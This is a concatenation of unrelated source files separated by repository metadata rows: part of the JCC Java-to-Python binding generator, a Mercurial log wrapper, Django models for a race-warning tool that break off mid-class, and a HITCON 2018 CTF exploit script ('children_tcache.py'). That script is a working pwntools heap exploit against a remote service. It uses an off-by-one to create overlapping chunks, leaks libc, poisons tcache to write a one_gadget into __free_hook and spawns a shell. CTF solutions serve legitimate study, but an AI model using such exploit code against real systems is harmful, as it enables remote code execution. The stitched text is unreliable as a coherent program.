tp_iternext = '((PyObject *(*)(t_%s *)) get_next<t_%s,%s%st_%s,%s>)' %(names[-1], names[-1], ns, sep, n, returnName)
else:
tp_iter = '0'
tp_iternext = '0'
if mappingMethod:
method, cardinality = mappingMethod
if cardinality > 1:
getName = 't_%s_%s_map_' %(names[-1], method.getName())
line(out, indent, 'static PyObject *%s(t_%s *self, PyObject *key);',
getName, names[-1])
else:
getName = 't_%s_%s' %(names[-1], method.getName())
line(out)
line(out, indent, 'static PyMappingMethods t_%s_as_mapping = {',
names[-1])
line(out, indent + 1, '0,')
line(out, indent + 1, '(binaryfunc) %s,', getName)
line(out, indent + 1, '0,')
line(out, indent, '};')
tp_as_mapping = '&t_%s_as_mapping' %(names[-1])
else:
tp_as_mapping = '0'
if sequenceLenMethod or sequenceGetMethod:
if sequenceLenMethod:
method, cardinality = sequenceLenMethod
lenName = 't_%s_%s_seq_' %(names[-1], method.getName())
line(out, indent, 'static int %s(t_%s *self);', lenName, names[-1])
else:
lenName = '0'
if sequenceGetMethod:
method, cardinality = sequenceGetMethod
getName = 't_%s_%s_seq_' %(names[-1], method.getName())
line(out, indent, 'static PyObject *%s(t_%s *self, int n);',
getName, names[-1])
else:
getName = '0'
line(out)
line(out, indent, 'static PySequenceMethods t_%s_as_sequence = {',
names[-1])
if python_ver < '2.5.0':
line(out, indent + 1, '(inquiry) %s,', lenName)
line(out, indent + 1, '0,')
line(out, indent + 1, '0,')
line(out, indent + 1, '(intargfunc) %s', getName)
line(out, indent, '};')
else:
line(out, indent + 1, '(lenfunc) %s,', lenName)
line(out, indent + 1, '0,')
line(out, indent + 1, '0,')
line(out, indent + 1, '(ssizeargfunc) %s', getName)
line(out, indent, '};')
tp_as_sequence = '&t_%s_as_sequence' %(names[-1])
else:
tp_as_sequence = '0'
if len(superNames) > 1:
base = '::'.join(('::'.join(cppnames(superNames[:-1])), superNames[-1]))
else:
base = superNames[-1]
line(out)
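    # Emit the DECLARE_TYPE macro (presumably defined in JCC's macros.h,
    # included by module() below) wiring the generated wrapper to its base
    # type, constructor and the protocol slots selected above.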
line(out, indent, 'DECLARE_TYPE(%s, t_%s, %s, %s, %s, %s, %s, %s, %s, %s);',
names[-1], names[-1], base, cppname(names[-1]), constructorName,
tp_iter, tp_iternext, tp_getset, tp_as_mapping, tp_as_sequence)
line(out)
line(out, indent, 'void t_%s::install(PyObject *module)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'installType(&%s$$Type, module, "%s", %d);',
names[-1], rename or names[-1], isExtension and 1 or 0)
for inner in cls.getDeclaredClasses():
if inner in typeset:
if Modifier.isStatic(inner.getModifiers()):
innerName = inner.getName().split('.')[-1]
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "%s", make_descriptor(&%s$$Type));',
names[-1], innerName[len(names[-1])+1:], innerName)
line(out, indent, '}')
line(out)
line(out, indent, 'void t_%s::initialize(PyObject *module)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "class_", make_descriptor(%s::initializeClass));',
names[-1], cppname(names[-1]))
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "wrapfn_", make_descriptor(t_%s::wrap_jobject));',
names[-1], names[-1])
if isExtension:
line(out, indent + 1, 'jclass cls = %s::initializeClass();',
cppname(names[-1]))
elif fields:
line(out, indent + 1, '%s::initializeClass();', cppname(names[-1]))
if isExtension:
count = 0
line(out, indent + 1, 'JNINativeMethod methods[] = {')
for name, methods in extMethods:
for method in methods:
line(out, indent + 2, '{ "%s", "%s", (void *) t_%s_%s%d },',
name, signature(method), names[-1], name, count)
count += 1
line(out, indent + 1, '};')
line(out, indent + 1, 'env->registerNatives(cls, methods, %d);',
count)
for field in fields:
fieldType = field.getType()
fieldName = field.getName()
value = '%s::%s' %(cppname(names[-1]), cppname(fieldName))
value = fieldValue(cls, value, fieldType)
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "%s", make_descriptor(%s));',
names[-1], fieldName, value)
line(out, indent, '}')
if not isExtension:
line(out)
line(out, indent, 'static PyObject *t_%s_cast_(PyTypeObject *type, PyObject *arg)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'if (!(arg = castCheck(arg, %s::initializeClass, 1)))', cppname(names[-1]))
line(out, indent + 2, 'return NULL;')
line(out, indent + 1, 'return t_%s::wrap_Object(%s(((t_%s *) arg)->object.this$));', names[-1], cppname(names[-1]), names[-1])
line(out, indent, '}')
line(out, indent, 'static PyObject *t_%s_instance_(PyTypeObject *type, PyObject *arg)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'if (!castCheck(arg, %s::initializeClass, 0))', cppname(names[-1]))
line(out, indent + 2, 'Py_RETURN_FALSE;')
line(out, indent + 1, 'Py_RETURN_TRUE;')
line(out, indent, '}')
if constructors:
line(out)
line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds)', names[-1], names[-1])
line(out, indent, '{')
if len(constructors) > 1:
currLen = -1
line(out, indent + 1, 'switch (PyTuple_GET_SIZE(args)) {')
withErr = False
for constructor in constructors:
params = constructor.getParameterTypes()
if len(params) != currLen:
if currLen >= 0:
withErr = True
line(out, indent + 2, 'goto err;')
currLen = len(params)
line(out, indent + 1, '%scase %d:', HALF_INDENT, currLen)
construct(out, indent + 2, cls, True, constructor, names)
line(out, indent + 1, '%sdefault:', HALF_INDENT)
if withErr:
line(out, indent + 1, '%serr:', HALF_INDENT)
line(out, indent + 2, 'PyErr_SetArgsError((PyObject *) self, "__init__", args);')
line(out, indent + 2, 'return -1;')
line(out, indent + 1, '}')
else:
construct(out, indent + 1, cls, False, constructors[0], names)
if constructors[0].getParameterTypes():
line(out, indent + 1, 'else')
line(out, indent + 1, '{')
line(out, indent + 2, 'PyErr_SetArgsError((PyObject *) self, "__init__", args);')
line(out, indent + 2, 'return -1;')
line(out, indent + 1, '}')
if isExtension:
line(out)
line(out, indent + 1, 'Py_INCREF((PyObject *) self);')
line(out, indent + 1, 'self->object.pythonExtension((jlong) (Py_intptr_t) (void *) self);')
line(out)
line(out, indent + 1, 'return 0;')
        line(out, indent, '}')
for name, methods in allMethods:
line(out)
modifiers = methods[0].getModifiers()
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
declargs, args, cardinality = ', PyObject *arg', ', arg', 1
else:
declargs, args, cardinality = methodargs(methods, superMethods)
static = Modifier.isStatic(modifiers)
if static:
line(out, indent, 'static PyObject *t_%s_%s(PyTypeObject *type%s)',
names[-1], name, declargs)
else:
line(out, indent, 'static PyObject *t_%s_%s(t_%s *self%s)',
names[-1], name, names[-1], declargs)
line(out, indent, '{')
if len(methods) > 1:
currLen = -1
line(out, indent + 1, 'switch (PyTuple_GET_SIZE(args)) {')
for method in methods:
params = method.getParameterTypes()
if len(params) != currLen:
if currLen >= 0:
line(out, indent + 2, 'break;')
currLen = len(params)
line(out, indent + 1, '%scase %d:', HALF_INDENT, currLen)
call(out, indent + 2, cls, True, method, names, cardinality,
isExtension)
line(out, indent + 1, '}')
else:
call(out, indent + 1, cls, False, methods[0], names, cardinality,
isExtension)
if args:
line(out)
if name in superMethods:
if static:
line(out, indent + 1, 'return callSuper(type, "%s"%s, %d);',
name, args, cardinality)
else:
line(out, indent + 1, 'return callSuper(&%s$$Type, (PyObject *) self, "%s"%s, %d);',
names[-1], name, args, cardinality)
else:
line(out, indent + 1, 'PyErr_SetArgsError(%s, "%s"%s);',
static and 'type' or '(PyObject *) self', name, args)
line(out, indent + 1, 'return NULL;')
line(out, indent, '}')
if isExtension:
count = 0
for name, methods in extMethods:
for method in methods:
line(out)
line(out, indent,
'static %s JNICALL t_%s_%s%d(JNIEnv *jenv, jobject jobj%s)',
jniname(method.getReturnType()), names[-1], name, count,
jniargs(method.getParameterTypes()))
count += 1
line(out, indent, '{')
extension(env, out, indent + 1, cls, names, name, count, method)
line(out, indent, '}')
line(out)
line(out, indent, 'static PyObject *t_%s_get__self(t_%s *self, void *data)',
names[-1], names[-1])
line(out, indent, '{')
indent += 1
line(out, indent, 'jlong ptr;')
line(out, indent, 'OBJ_CALL(ptr = self->object.pythonExtension());')
line(out, indent, 'PyObject *obj = (PyObject *) (Py_intptr_t) ptr;')
line(out)
line(out, indent, 'if (obj != NULL)')
line(out, indent, '{')
line(out, indent + 1, 'Py_INCREF(obj);')
line(out, indent + 1, 'return obj;')
line(out, indent, '}')
line(out, indent, 'else')
line(out, indent + 1, 'Py_RETURN_NONE;')
indent -= 1
line(out, indent, '}')
if instanceFields:
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
line(out)
fieldType = field.getType()
typeName = typename(fieldType, cls, False)
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not fieldType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(value = self->object._get_%s());',
fieldName)
line(out, indent + 1, returnValue(cls, fieldType, 'value'))
line(out, indent, '}')
if not Modifier.isFinal(field.getModifiers()):
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not fieldType.isPrimitive() and '((jobject) NULL)' or '')
sig, check, x = parseArgs([fieldType], cls)
line(out, indent + 1, 'if (!parseArg(arg, "%s"%s, &value))',
sig, check)
line(out, indent + 1, '{')
line(out, indent + 2, 'INT_CALL(self->object._set_%s(value));',
fieldName)
line(out, indent + 2, 'return 0;')
line(out, indent + 1, '}')
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
fieldName)
line(out, indent + 1, 'return -1;')
line(out, indent, '}')
if propMethods:
for fieldName, methods in propMethods:
line(out)
getter = None
setters = []
sort(methods, key=lambda x: x.getName())
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = method
elif methodName.startswith('set'):
setters.append(method)
if getter:
methodName = getter.getName()
returnType = getter.getReturnType()
typeName = typename(returnType, cls, False)
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not returnType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(value = self->object.%s());',
methodName)
line(out, indent + 1, returnValue(cls, returnType, 'value'))
line(out, indent, '}')
if setters:
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
methodName = setters[0].getName()
for method in setters:
argType = method.getParameterTypes()[0]
typeName = typename(argType, cls, False)
line(out, indent + 1, '{')
line(out, indent + 2, '%s value%s;', typeName,
not argType.isPrimitive() and '((jobject) NULL)' or '')
sig, check, x = parseArgs([argType], cls)
line(out, indent + 2, 'if (!parseArg(arg, "%s"%s, &value))',
sig, check)
line(out, indent + 2, '{')
line(out, indent + 3, 'INT_CALL(self->object.%s(value));',
methodName)
line(out, indent + 3, 'return 0;')
line(out, indent + 2, '}')
line(out, indent + 1, '}')
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
fieldName)
line(out, indent + 1, 'return -1;')
line(out, indent, '}')
if mappingMethod:
method, cardinality = mappingMethod
if cardinality > 1:
methodName = method.getName()
getName = 't_%s_%s_map_' %(names[-1], methodName)
line(out)
line(out, indent, 'static PyObject *%s(t_%s *self, PyObject *arg)',
getName, names[-1])
line(out, indent, '{')
call(out, indent + 1, cls, False, method, names, 1, isExtension)
line(out)
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
methodName)
line(out, indent + 1, 'return NULL;')
line(out, indent, '}')
if sequenceLenMethod:
method, cardinality = sequenceLenMethod
methodName = method.getName()
lenName = 't_%s_%s_seq_' %(names[-1], methodName)
line(out)
line(out, indent, 'static int %s(t_%s *self)', lenName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s len;',
typename(method.getReturnType(), cls, False))
line(out, indent + 1, 'INT_CALL(len = self->object.%s());', methodName)
line(out, indent + 1, 'return (int) len;')
line(out, indent, '}')
if sequenceGetMethod:
method, cardinality = sequenceGetMethod
methodName = method.getName()
returnType = method.getReturnType()
getName = 't_%s_%s_seq_' %(names[-1], methodName)
line(out)
line(out, indent, 'static PyObject *%s(t_%s *self, int n)', getName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s result%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(result = self->object.%s((%s) n));',
methodName, typename(method.getParameterTypes()[0], cls, False))
line(out, indent + 1, returnValue(cls, returnType, 'result'))
line(out, indent, '}')
while indent:
indent -= 1
line(out, indent, '}')
def package(out, allInOne, cppdir, namespace, names):
if not allInOne:
out = file(os.path.join(os.path.join(cppdir, *names),
'__init__.cpp'), 'w')
if allInOne and not names or not allInOne:
line(out, 0, '#include <jni.h>')
line(out, 0, '#include <Python.h>')
line(out, 0, '#include "JCCEnv.h"')
line(out, 0, '#include "functions.h"')
if not names:
line(out)
line(out, 0, 'PyObject *initVM(PyObject *module, PyObject *args, PyObject *kwds);')
packages = []
types = []
namespaces = namespace.items()
sort(namespaces, key=lambda x: x[0])
for name, entries in namespaces:
if entries is True:
if names:
line(out, 0, '#include "%s/%s.h"', '/'.join(names), name)
else:
line(out, 0, '#include "%s.h"', name)
types.append(name)
else:
packages.append((name, entries))
indent = 0
if names:
line(out)
for name in names:
line(out, indent, 'namespace %s {', cppname(name))
indent += 1
        line(out)
for name, entries in packages:
line(out, indent, 'namespace %s {', cppname(name))
line(out, indent + 1, 'void __install__(PyObject *module);')
line(out, indent + 1, 'void __initialize__(PyObject *module);')
line(out, indent, '}')
line(out)
line(out, indent, 'void __install__(PyObject *module)')
line(out, indent, '{')
for name in types:
line(out, indent + 1, 't_%s::install(module);', name)
for name, entries in packages:
line(out, indent + 1, '%s::__install__(module);', cppname(name))
line(out, indent, '}')
line(out)
if not names:
line(out, indent, 'PyObject *__initialize__(PyObject *module, PyObject *args, PyObject *kwds)')
line(out, indent, '{')
line(out, indent + 1, 'PyObject *env = initVM(module, args, kwds);')
line(out)
line(out, indent + 1, 'if (env == NULL)')
line(out, indent + 2, 'return NULL;')
line(out)
        line(out, indent + 1, 'try {')
indent += 1
else:
line(out, indent, 'void __initialize__(PyObject *module)')
line(out, indent, '{')
for name in types:
line(out, indent + 1, 't_%s::initialize(module);', name)
for name, entries in packages:
line(out, indent + 1, '%s::__initialize__(module);', cppname(name))
if not names:
line(out, indent + 1, 'return env;')
indent -= 1
line(out, indent + 1, '} catch (JCCEnv::exception e) {')
line(out, indent + 2, 'PyErr_SetJavaError(e.throwable);')
line(out, indent + 2, 'return NULL;')
line(out, indent + 1, '}')
line(out, indent, '}')
while indent:
indent -= 1
line(out, indent, '}')
if not allInOne:
out.close()
else:
line(out)
for name, entries in packages:
package(out, allInOne, cppdir, entries, names + (name,))
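# Each Java package becomes a nested C++ namespace with __install__ /
# __initialize__ hooks for its types and sub-packages; module() below wires
# them into the extension's top-level init function.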
def module(out, allInOne, classes, cppdir, moduleName, shared):
extname = '_%s' %(moduleName)
line(out, 0, '#include <Python.h>')
line(out, 0, '#include "macros.h"')
line(out, 0, '#include "jccfuncs.h"')
if allInOne:
out_init = file(os.path.join(cppdir, '__init__.cpp'), 'w')
namespaces = {}
for cls in classes:
namespace = namespaces
classNames = cls.getName().split('.')
for className in classNames[:-1]:
namespace = namespace.setdefault(className, {})
namespace[classNames[-1]] = True
if allInOne:
package(out_init, True, cppdir, namespaces, ())
out_init.close()
else:
package(None, False, cppdir, namespaces, ())
line(out)
line(out, 0, 'PyObject *initJCC(PyObject *module);')
line(out, 0, 'void __install__(PyObject *module);')
line(out, 0, 'extern PyTypeObject JObject$$Type, ConstVariableDescriptor$$Type, FinalizerClass$$Type, FinalizerProxy$$Type;')
line(out, 0, 'extern void _install_jarray(PyObject *);')
line(out)
line(out, 0, 'extern "C" {')
line(out)
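    # The emitted init<name> symbol is the Python 2 C-API module entry
    # point (hence Py_InitModule3 below); Python 3 would require
    # PyModule_Create instead.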
line(out, 1, 'void init%s(void)', extname)
line(out, 1, '{')
line(out, 2, 'PyObject *module = Py_InitModule3("%s", jcc_funcs, "");',
         extname)
line(out)
line(out, 2, 'initJCC(module);')
line(out)
line(out, 2, 'INSTALL_TYPE(JObject, module);')
line(out, 2, 'INSTALL_TYPE(ConstVariableDescriptor, module);')
line(out, 2, 'INSTALL_TYPE(FinalizerClass, module);')
line(out, 2, 'INSTALL_TYPE(FinalizerProxy, module);')
line(out, 2, '_install_jarray(module);')
line(out, 2, '__install__(module);')
line(out, 1, '}')
line(out, 0, '}')
def compile(env, jccPath, output, moduleName, install, dist, debug, jars,
version, prefix, root, install_dir, use_distutils,
shared, compiler, modules, wininst):
try:
if use_distutils:
raise ImportError
from setuptools import setup, Extension
with_setuptools = True
if shared and not SHARED:
raise NotImplementedError, "JCC was not built with --shared mode support, see JCC's INSTALL file for more information"
except ImportError:
if python_ver < '2.4':
raise ImportError, 'setuptools is required when using Python 2.3'
if shared:
raise ImportError, 'setuptools is required when using --shared'
from distutils.core import setup, Extension
with_setuptools = False
extname = '_%s' %(moduleName)
modulePath = os.path.join(output, moduleName)
if not os.path.isdir(modulePath):
os.makedirs(modulePath)
out = file(os.path.join(modulePath, '__init__.py'), 'w')
line(out)
if shared:
line(out, 0, "import os, sys")
line(out)
line(out, 0, "if sys.platform == 'win32':")
line(out, 1, "import jcc, %s", extname)
line(out, 0, "else:")
line(out, 1, "import %s", extname)
else:
line(out, 0, 'import os, %s', extname)
line(out)
line(out, 0, '__dir__ = os.path.abspath(os.path.dirname(__file__))')
package_data = []
for jar in jars:
shutil.copy2(jar, modulePath)
package_data.append(os.path.basename(jar))
if modules:
for module in modules:
pfile = module.split('.')[0] + '.py'
shutil.copy2(pfile, modulePath)
pfile = os.path.basename(pfile)
cfile = pfile + (__debug__ and 'c' or 'o')
py_compile.compile(os.path.join(modulePath, pfile),
os.path.join(modulePath, cfile),
doraise=True)
line(out)
line(out, 0, 'class JavaError(Exception):')
line(out, 1, 'def getJavaException(self):')
line(out, 2, 'return self.args[0]')
line(out, 1, 'def __str__(self):')
line(out, 2, 'writer = %s.StringWriter()', extname)
line(out, 2, 'self.getJavaException().printStackTrace(%s.PrintWriter(writer))', extname)
line(out, 2, 'return "\\n".join((super(JavaError, self).__str__(), " Java stacktrace:", str(writer)))')
line(out)
line(out, 0, 'class InvalidArgsError(Exception):')
line(out, 1, 'pass')
line(out)
line(out, 0, '%s._setExceptionTypes(JavaError, InvalidArgsError)', extname)
if version:
line(out)
line(out, 0, 'VERSION = "%s"', version)
line(out, 0, 'CLASSPATH = [%s]' %(', '.join(['os.path.join(__dir__, "%s")' %(os.path.basename(jar)) for jar in jars])))
line(out, 0, 'CLASSPATH = os.pathsep.join(CLASSPATH)')
line(out)
line(out, 0, 'from %s import *', extname)
out.close()
includes = [os.path.join(output, extname),
os.path.join(jccPath, 'sources')]
sources = ['JObject.cpp', 'JArray.cpp', 'functions.cpp', 'types.cpp']
if not shared:
sources.append('jcc.cpp')
sources.append('JCCEnv.cpp')
for source in sources:
shutil.copy2(os.path.join(jccPath, 'sources', source),
os.path.join(output, extname))
sources = []
for path, dirs, names in os.walk(os.path.join(output, extname)):
for name in names:
if name.endswith('.cpp'):
sources.append(os.path.join(path, name))
script_args = ['build_ext']
includes[0:0] = INCLUDES
compile_args = CFLAGS
link_args = LFLAGS
    defines = ['PYTHON']
if compiler:
script_args.append('--compiler=%s' %(compiler))
if shared:
defines.append('_jcc_shared')
script_args.append('--define=%s' %(','.join(defines)))
if debug:
script_args.append('--debug')
compile_args += DEBUG_CFLAGS
elif sys.platform == 'win32':
pass
elif sys.platform == 'sunos5':
link_args.append('-Wl,-s')
else:
link_args.append('-Wl,-S')
if install:
script_args.append('install')
if prefix:
script_args.append('--prefix=%s' % prefix)
if root:
script_args.append('--root=%s' % root)
if install_dir:
script_args.append('--install-lib=%s' % install_dir)
if dist:
if wininst:
script_args.append('bdist_wininst')
elif with_setuptools:
script_args.append('bdist_egg')
else:
script_args.append('bdist')
args = {
'extra_compile_args': compile_args,
'extra_link_args': link_args,
'include_dirs': includes,
'sources': sources
}
if shared:
shlibdir = os.path.dirname(os.path.dirname(_jcc.__file__))
if sys.platform == 'darwin': # distutils no good with -R
machine = platform.machine()
if machine.startswith('iPod') or machine.startswith('iPhone'):
args['extra_link_args'] += ['-L' + shlibdir]
else:
args['extra_link_args'] += ['-Wl,-rpath', shlibdir]
args['library_dirs'] = [shlibdir]
args['libraries'] = ['jcc']
elif sys.platform == 'linux2': # distutils no good with -R
args['extra_link_args'] += ['-Wl,-rpath', shlibdir]
args['library_dirs'] = [shlibdir]
args['libraries'] = ['jcc']
elif sys.platform == 'win32':
jcclib = 'jcc%s.lib' %(debug and '_d' or '')
args['extra_link_args'] += [os.path.join(shlibdir, 'jcc', jcclib)]
else:
raise NotImplementedError, "shared mode on %s" %(sys.platform)
extensions = [Extension('.'.join([moduleName, extname]), **args)]
args = {
'name': moduleName,
'packages': [moduleName],
'package_dir': {moduleName: modulePath},
'package_data': {moduleName: package_data},
'version': version,
'ext_modules': extensions,
'script_args': script_args
}
if with_setuptools:
args['zip_safe'] = False
setup(**args)
| gpl-2.0 | 2,680,661,775,088,932,400 | 38.441541 | 196 | 0.528841 | false | 3.7268 | false | false | false |
scwuaptx/CTF | 2018-writeup/hitcon/children_tcache.py | 1 | 1235 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "10.211.55.19"
#host = "52.68.236.186"
#port = 56746
host = "54.178.132.125"
port = 8763
r = remote(host,port)
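# Menu helpers for the challenge binary: option 1 allocates a note of the
# given size/content, 2 prints one, 3 frees one (inferred from the prompts).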
def allocate(size, data):
r.recvuntil(":")
r.sendline("1")
r.recvuntil("e:")
r.sendline(str(size))
r.recvuntil("a:")
r.send(data)
def show(idx):
r.recvuntil(":")
r.sendline("2")
r.recvuntil("x:")
r.sendline(str(idx))
def free(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil("x:")
r.sendline(str(idx))
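# Exploit outline (a sketch; the offsets 0x3ebca0, 0x3ed8e8 and 0x4f322 are
# assumed to match the challenge's glibc 2.27 build):
#  1. groom the heap and use the program's off-by-one NULL byte write to
#     shrink a chunk size field, producing overlapping chunks,
#  2. show() a slot that overlaps a freed unsorted-bin chunk to leak a
#     main_arena pointer and recover the libc base,
#  3. poison a tcache fd so an allocation returns __free_hook, then write a
#     one_gadget address there,
#  4. free() anything to trigger the hook and spawn a shell.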
for i in range(6):
allocate(0x80,"a")
allocate(0x38,"a") #6
allocate(0x4e0+0x490,"b") #7
allocate(0x410,"c") #8
allocate(0x80,"d") #9
free(7)
free(6)
allocate(0x68,"c"*0x68) #6
allocate(0x80,"d"*0x78) #7
free(5)
allocate(0x60,"da") #5
for i in range(5) :
free(i)
free(9)
free(7)
free(8)
allocate(0x90,"ccc")
allocate(0x7f0-0xa0,"d")
allocate(0x50,"d")
free(5)
allocate(0x30,"a")
allocate(0x60,"a")
allocate(0x20,"gg")
show(4)
libc = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x3ebca0
print hex(libc)
free_hook = libc + 0x3ed8e8
free(0)
allocate(0xa0,"b"*0x70 + p64(free_hook))
allocate(0x90,"b")
magic = libc +0x4f322
allocate(0x90,p64(magic))
free(5)
r.interactive()
| gpl-2.0 | -9,162,183,849,842,138,000 | 15.689189 | 61 | 0.614575 | false | 2.213262 | false | false | false |
markdrago/flypaper | src/mercurial_repo.py | 1 | 2562 | import os
import subprocess
from datetime import datetime
from changeset_list import ChangesetList
from changeset import Changeset
class MercurialRepo(object):
def __init__(self, repodir):
self._repodir = repodir
#NOTE: Since a commit may have 0 files changed (merge), we add a preceding
# '#' to the lines which contain the description and modified files.
#We do this to avoid having 3 consecutive newlines. That would cause a
#problem since we're using newlines (and double newlines) as a delimiter.
#We use newlines because they will not be present in the description once
#we force it to just show the first line and it won't show up in the list
#of files either. This way we can get all of the data we need with one
#command and we will be able to break it up safely and reliably.
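    #For illustration, one entry of the raw output looks roughly like this
    #(hypothetical values):
    #  1f2e3d... (40-char node)
    #  2013-05-01
    #  #first line of the description
    #  #src/a.py src/b.py
    #Entries are separated by a blank line.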
def get_full_changesetlist(self, startdate, changeset_list):
"return ChangesetList of all changesets since startdate"
datestr = startdate.strftime('%Y-%m-%d')
hg_format = '{node}\n{date|shortdate}\n#{desc|firstline}\n#{files}\n\n'
cmd = 'hg log -d ">' + datestr + '" --template "' + hg_format + '"'
result = self.get_command_output(cmd)
self._populate_changeset_list(result, changeset_list)
def _populate_changeset_list(self, full_logoutput, changeset_list):
for nodeblock in full_logoutput.split("\n\n"):
changeset = self._create_single_changeset(nodeblock)
if changeset is not None:
changeset_list.add(changeset)
def _create_single_changeset(self, logoutput):
if logoutput.strip() == '':
return None
(commitid, datestr, desc, files) = [
x.strip() for x in logoutput.split("\n", 3)
]
#remove those awkward prefixed # characters
desc = desc[1:].strip()
files = files[1:].strip()
date = datetime.strptime(datestr, '%Y-%m-%d')
#create the base changeset
changeset = Changeset(commitid, date, desc)
#add the modified files to the changeset
if files.strip() != '':
for filename in files.split(' '):
changeset.add_modified_file(filename)
return changeset
def get_command_output(self, cmd):
"run a shell command and get the output"
oldpath = os.getcwd()
os.chdir(self._repodir)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
result = proc.communicate()[0]
os.chdir(oldpath)
return result
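# Minimal usage sketch (assumes a local Mercurial checkout and the
# ChangesetList API imported above):
#   repo = MercurialRepo('/path/to/repo')
#   changesets = ChangesetList()
#   repo.get_full_changesetlist(datetime(2013, 1, 1), changesets)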
| mit | -5,807,498,315,869,296,000 | 37.238806 | 79 | 0.639344 | false | 4.041009 | false | false | false |
cogumbreiro/relay | ui/relay/warnings/models.py | 1 | 11533 | from django.db import models
from django.db.models import permalink
import re
import sys
def warn(msg):
sys.stderr.write(msg)
class Code_base(models.Model):
program_name = models.CharField(max_length=50, core=True)
version = models.CharField(max_length=40, core=True)
compile_options = models.CharField(max_length=100)
def __str__(self):
return "%s v.%s" % (self.program_name, self.version)
def get_absolute_url(self):
return ('relay.warnings.views.code_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
class Admin:
# Admin options go here
pass
class Note(models.Model):
explaination = models.TextField(core=True)
last_updated = models.DateTimeField(core=True, auto_now=True)
def __str__(self):
return "%s %s" % (self.explaination, self.last_updated)
class Admin:
# Admin options go here
pass
class Label(models.Model):
label = models.CharField(max_length=50, core=True)
example = models.TextField(core=True)
def __str__(self):
return self.label
class Admin:
# Admin options go here
pass
def first_labels(n, ls):
    # Join the first n labels into a comma-separated string.
    return ", ".join(str(l) for l in ls.all()[:n])
class Function(models.Model):
cil_id = models.IntegerField(core=True, db_index=True)
name = models.CharField(max_length=50, core=True)
labels = models.ManyToManyField(Label, filter_interface=models.VERTICAL)
program = models.ForeignKey(Code_base, limit_choices_to={})
def __str__(self):
return "%s (%d)" % (self.name, self.cil_id)
def first_labels(self):
return first_labels(2, self.labels)
class Admin:
list_display = ('cil_id', 'name', 'program', 'first_labels')
class Program_point(models.Model):
file_name = models.CharField(max_length=100, core=True)
line_num = models.IntegerField(core=True, db_index=True)
parent_function = models.ForeignKey(Function,
null=True, limit_choices_to={})
def __str__(self):
return "%d in %s" % (self.line_num, self.file_name)
class Admin:
# Admin options go here
pass
class Lval(models.Model):
var_id = models.IntegerField(null=True, db_index=True)
printed = models.CharField(max_length=100, core=True)
rep_size = models.IntegerField(null=True)
declared_at = models.ForeignKey(Program_point, null=True)
is_global = models.BooleanField()
def __str__(self):
s = self.printed
if (self.var_id):
s += " (%d)" % self.var_id
if (self.rep_size):
s += " |%d|" % self.rep_size
return s
class Admin:
# Admin options go here
pass
class Call_path(models.Model):
root_function = models.ForeignKey(Function, limit_choices_to={})
spawn_site = models.ForeignKey(Program_point,
related_name="spawns", limit_choices_to={})
empty_ls = models.ForeignKey(Program_point,
related_name="empty_ls", null=True,
limit_choices_to={})
# not including the edges right now...
def __str__(self):
return self.root_function.__str__() + " -> ..."
def program(self):
return str(self.root_function.program)
class Admin:
list_display = ('program', 'root_function', 'spawn_site')
class Call_edge(models.Model):
path = models.ForeignKey(Call_path, limit_choices_to={})
caller = models.ForeignKey(Function, related_name="is_caller",
limit_choices_to={})
callee = models.ForeignKey(Function, related_name="is_callee",
limit_choices_to={})
def __str__(self):
return str(self.caller) + " -> " + str(self.callee)
class Admin:
# Admin options go here
pass
class Access(models.Model):
lval = models.ForeignKey(Lval, related_name="reads_writes")
accessed_through = models.ForeignKey(Call_path)
occurs_at = models.ForeignKey(Program_point)
locks = models.ManyToManyField(Lval, filter_interface=models.VERTICAL)
def __str__(self):
return str(self.lval) + " @ " + str(self.occurs_at)
def has_lock(self):
return len(self.locks.all()[:1]) != 0
has_lock.boolean = True
class Admin:
list_display = ('lval', 'occurs_at', 'has_lock')
search_fields = ['occurs_at']
class Run(models.Model):
time_of_run = models.DateTimeField(editable=True, auto_now_add=True)
code = models.ForeignKey(Code_base, limit_choices_to={})
changes_to_analysis = models.TextField(core=True)
analysis_settings = models.TextField(core=True)
def __str__(self):
return str(self.code) + " " + str(self.time_of_run)
def get_absolute_url(self):
return ('relay.warnings.views.run_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
class Admin:
list_display = ('id', 'code', 'time_of_run')
list_filter = ('code', 'time_of_run')
class Race(models.Model):
